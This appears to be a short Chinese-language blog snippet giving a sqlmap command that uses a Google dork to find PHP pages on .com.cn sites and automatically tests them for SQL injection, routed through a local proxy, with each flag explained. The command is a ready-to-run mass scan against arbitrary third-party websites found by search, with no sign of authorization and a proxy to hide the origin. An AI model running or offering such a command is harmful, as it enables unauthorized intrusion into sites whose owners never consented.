sqlmap

sqlmap -g "inurl:php?id=10 site:.com.cn" --proxy "http://127.0.0.1:1080" --threads 5 --batch --answer "extending=N,follow=N,keep=N,exploit=n" --smart

-g                  #谷歌搜索

–proxy          #代理   (挂了ss就直接代理本地)

–threads       #线程

–batch          #自动回复

–answer “extending=N,follow=N,keep=N,exploit=n”           #这个可以对一些特定的问题作出回答，在自动化注入中用

–smart          #当有大量目标时，这个就只检查基于错误的注入点

（更多…）